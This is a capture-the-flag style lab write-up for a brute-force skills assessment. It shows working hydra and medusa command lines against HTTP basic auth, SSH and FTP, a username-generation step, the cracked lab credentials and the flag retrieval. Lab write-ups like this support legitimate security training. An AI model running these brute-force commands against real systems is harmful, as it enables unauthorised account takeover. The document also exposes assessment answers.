Skill Assessment
Part 1
Task
The first part of the skills assessment will require you to brute-force the the target instance. Successfully finding the correct login will provide you with the username you will need to start Skills Assessment Part 2.
You might find the following wordlists helpful in this engagement: usernames.txt and passwords.txt
What is the password for the basic auth login? After successfully brute forcing the login, what is the username you have been given for the next part of the skills assessment?
Attempt
Since from the task description I know it uses basic auth, so I started attacking that with hydra:
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt 94.237.60.18 http-get / -s 44686
You don’t need to specify any parameter if the page uses basic auth.
I got the credentials in a second:
[44686][http-get] host: 94.237.60.18 login: admin password: Admin123
Access the page with the credentials and got the username for part 2satwossh.
Part 2
Task
This is the second part of the skills assessment. YOU NEED TO COMPLETE THE FIRST PART BEFORE STARTING THIS. Use the username you were given when you completed part 1 of the skills assessment to brute force the login on the target instance.
What is the username of the ftp user you find via brute-forcing? What is the flag contained within flag.txt
Attempt
ssh brute force:
hydra -l satwossh -P /usr/share/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt ssh://94.237.60.18:57621
Got credentials: login: satwossh password: password1
Now ssh into the target:
ssh [email protected] -p57621
Found good files and a convenient tool:
ls
IncidentReport.txt passwords.txt username-anarchy
Got hints from the report:
Upon reviewing recent FTP activity, we have identified suspicious behavior linked to a specific user. The user **Thomas Smith** has been regularly uploading files to the server during unusual hours and has bypassed multiple security protocols. This activity requires immediate investigation.
All logs point towards Thomas Smith being the FTP user responsible for recent questionable transfers. We advise closely monitoring this user’s actions and reviewing any files uploaded to the FTP server.
I used username-anarchy with Thomas Smith:
./username-anarchy/username-anarchy Thomas Smith > thomas_smith_usernames.txt
finally happy attack time:
medusa -h 127.0.0.1 -U thomas_smith_usernames.txt -P passwords.txt -M ftp -t 5 | grep SUCCESS
Got the credentials thomas:chocolate!.
ftp login:
ftp ftp://thomas@localhost
Now find the flag:
ls
get flag.txt
!cat flag.txt
Got the flag.